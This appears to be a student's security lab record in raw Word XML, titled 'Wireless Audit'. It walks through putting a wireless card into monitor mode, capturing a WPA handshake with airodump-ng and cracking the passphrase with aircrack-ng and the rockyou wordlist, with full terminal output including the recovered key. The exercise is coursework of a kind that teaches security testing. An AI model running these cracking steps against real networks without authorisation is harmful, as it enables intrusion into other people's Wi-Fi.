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9409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Ex. No.: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E48DBB0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27/04/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20AE2D" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C1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WIRELESS AUDIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6D9E0" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C1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</w:p>
    <w:p w14:paraId="33A14503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</w:t>
      </w:r>
      <w:r w:rsidRPr="00945C17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 xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00945C17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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE14760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To perform wireless audit on Access Point and decrypt WPA keys using aircrack-ng tool in Kalilinux OS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C0C0F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</w:p>
    <w:p w14:paraId="26E781A7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ALGORITHM</w:t>
      </w:r>
      <w:r w:rsidRPr="00945C17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 xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A65B438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Check the current wireless interface with iwconfig command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF85EF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Get the channel number, MAC address and ESSID with iwlist command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30820781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Start the wireless interface in monitor mode on specific AP channel with airmon-ng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0766A600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If processes are interfering with airmon-ng then kill those process. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB0214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Again start the wireless interface in monitor mode on specific AP channel with airmon-ng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438B75F5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Start airodump-ng to capture Initialization Vectors(IVs). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583916C9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Capture IVs for atleast 5 to 10 minutes and then press Ctrl + C to stop the operation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212C149B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List the files to see the captured files </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331F5441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165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Run aircrack-ng to crack key using the IVs collected and using the dictionary file rockyou.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F00233" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C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If the passphrase is found in dictionary then Key Found message displayed; else print Key Not Found. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39914E65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</w:p>
    <w:p w14:paraId="167959CD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 xml:space="preserve">OUTPUT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4876D089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112AE10D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root@kali:~# iwconfig </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35087BED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eth0 no wireless extensions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21870286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wlan0 </w:t>
      </w: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IEEE 802.11bgn ESSID:off/any </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537896D6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Mode:Managed </w:t>
      </w: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Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543F6682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Encryption key:off Power Management:off </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4C701B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lo no wireless extensions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52757E58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root@kali:~# iwlist wlan0 scanning </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007CDB33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wlan0 Scan completed : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F1F636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Cell 01 - </w:t>
      </w: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Address: 14:F6:5A:F4:57:22 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7F68C8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Channel:6 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE3ACED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Frequency:2.437 GHz (Channel 6) Quality=70/70 Signal level=-27 dBm Encryption key:on </w:t>
      </w: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ESSID:"BENEDICT" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786DEC11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Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C063E90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Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069AF3DB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945C17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36 Mb/s; 48 Mb/s; 54 Mb/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0189CE5C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Mode:Master </w:t>
      </w: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Extra:tsf=00000000425b0a37 Extra: Last beacon: 548ms ago IE: WPA Version 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE62EF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Group Cipher : TKIP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E6378E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Pairwise Ciphers (2) : CCMP TKIP Authentication Suites (1) : PSK </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE0191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root@kali:~# airmon-ng start wlan0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBED1A1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Found 2 processes that could cause trouble. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D0DA8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If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1681B815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PID Name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097FAD23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1148 NetworkManager </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0221D157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7"/>
        <w:gridCol w:w="2737"/>
        <w:gridCol w:w="2737"/>
      </w:tblGrid>
      <w:tr w:rsidR="00945C17" w:rsidRPr="00945C17" w14:paraId="30435D42" w14:textId="77777777" w:rsidTr="00497F0F">
        <w:trPr>
          <w:trHeight w:val="109"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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689DDE" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C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945C17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1324 wpa_supplicant PHY Interface </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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7D2E62" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C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945C17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Driver </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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694331" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C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945C17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Chipset </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00945C17" w:rsidRPr="00945C17" w14:paraId="7C29BDF0" w14:textId="77777777" w:rsidTr="00497F0F">
        <w:trPr>
          <w:trHeight w:val="109"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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D7822" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C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945C17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phy0 wlan0 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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D66AF2" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C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945C17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ath9k_htc </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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D1A166" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C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945C17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Atheros Communications, Inc. AR9271 802.11n </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68689200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0EB606E9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root@kali:~# airodump-ng -w atheros -c 6 --bssid 14:F6:5A:F4:57:22 wlan0mon CH 6 </w:t>
      </w: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][ Elapsed: 5 mins ][ 2016-10-05 01:35 ][ </w:t>
      </w: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WPA handshake</w:t>
      </w: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: 14:F6:5A:F4:57: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833C440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BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 14:F6:5A:F4:57:22 -31 100 3104 10036 0 6 54e. WPA CCMP PSK B </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCC083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BSSID STATION PWR Rate Lost Frames Probe 14:F6:5A:F4:57:22 70:05:14:A3:7E:3E -32 2e- 0 0 10836 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7245C5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root@kali:~# ls -l </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB6ADB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total 10348 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F6106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-rw-r--r-- 1 root root 10580359 Oct 5 01:35 </w:t>
      </w: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atheros-01.cap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE9FAA0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-rw-r--r-- 1 root root 481 Oct 5 01:35 atheros-01.csv </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D407EA0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-rw-r--r-- 1 root root 598 Oct 5 01:35 atheros-01.kismet.csv </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E46AA4C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-rw-r--r-- 1 root root 2796 Oct 5 01:35 atheros-01.kismet.netxml </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38000E36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root@kali:~# aircrack-ng -a 2 atheros-01.cap -w /usr/share/wordlists/rockyou.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752DF6F8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[00:00:52] 84564 keys tested (1648.11 k/s) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6881A0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KEY FOUND! [ rec12345 ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6741C8F0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Master Key : CA 53 9B 5C 23 16 70 E4 84 53 16 9E FB 14 77 49 A9 7A A0 2D 9F BB 2B C3 8D 26 D2 33 54 3D 3A 43 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C69C17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Transient Key : F5 F4 BA AF 57 6F 87 04 58 02 ED 18 62 37 8A 53 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F16B1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38 86 F1 A2 CA 0D 4A 8D D6 EC ED 0D 6C 1D C1 AF </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F65334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81 58 81 C2 5D 58 7F FA DE 13 34 D6 A2 AE FE 05 F6 53 B8 CA A0 70 EC 02 1B EA 5F 7A DA 7A EC 7D </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2AFA1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945C17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EAPOL HMAC 0A 12 4C 3D ED BD EE C0 2B C9 5A E3 C1 65 A8 5C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878A71A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7AF74B4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11CD236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9B963FD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83DE336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94263A9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2F62A73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8C778BD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376FA0E9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07CD19A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F81DB4F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13C741CA" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C17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lastRenderedPageBreak/>
        <w:t>RESULT</w:t>
      </w:r>
      <w:r w:rsidRPr="00945C17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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E339EEC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</w:p>
    <w:p w14:paraId="7D64BAF1" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C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945C17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ab/>
        <w:t xml:space="preserve">Thus, wireless audit on Access Point and decrypt WPA keys using aircrack-ng tool in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C64AF62" w14:textId="77777777" w:rsidR="00945C17" w:rsidRPr="00945C17" w:rsidRDefault="00945C17" w:rsidP="00945C17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945C17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Kali Linux OS has been performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FAE380" w14:textId="77777777" w:rsidR="000E1732" w:rsidRDefault="000E1732"/>
    <w:sectPr w:rsidR="000E1732" w:rsidSect="00945C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AD9B3" w14:textId="77777777" w:rsidR="00E53E4D" w:rsidRDefault="00E53E4D" w:rsidP="00945C17">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="06FD94F3" w14:textId="77777777" w:rsidR="00E53E4D" w:rsidRDefault="00E53E4D" w:rsidP="0094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7CB7E" w14:textId="77777777" w:rsidR="00945C17" w:rsidRDefault="00945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9901" w14:textId="77777777" w:rsidR="00945C17" w:rsidRDefault="00945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B3F59" w14:textId="77777777" w:rsidR="00945C17" w:rsidRDefault="00945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59E9B" w14:textId="77777777" w:rsidR="00E53E4D" w:rsidRDefault="00E53E4D" w:rsidP="00945C17">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6325CE3C" w14:textId="77777777" w:rsidR="00E53E4D" w:rsidRDefault="00E53E4D" w:rsidP="0094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7EEC" w14:textId="77777777" w:rsidR="00945C17" w:rsidRDefault="00945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D13ED" w14:textId="47A506B8" w:rsidR="00945C17" w:rsidRDefault="00945C17">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t>210701119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2014" w14:textId="77777777" w:rsidR="00945C17" w:rsidRDefault="00945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CA2E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF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12119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17"/>
    <w:rsid w:val="000E1732"/>
    <w:rsid w:val="0079549B"/>
    <w:rsid w:val="00945C17"/>
    <w:rsid w:val="00E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691"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A1549711-0318-413C-84F5-169935E3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C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5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C17"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00945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2024-05-17T19:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-17T19:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>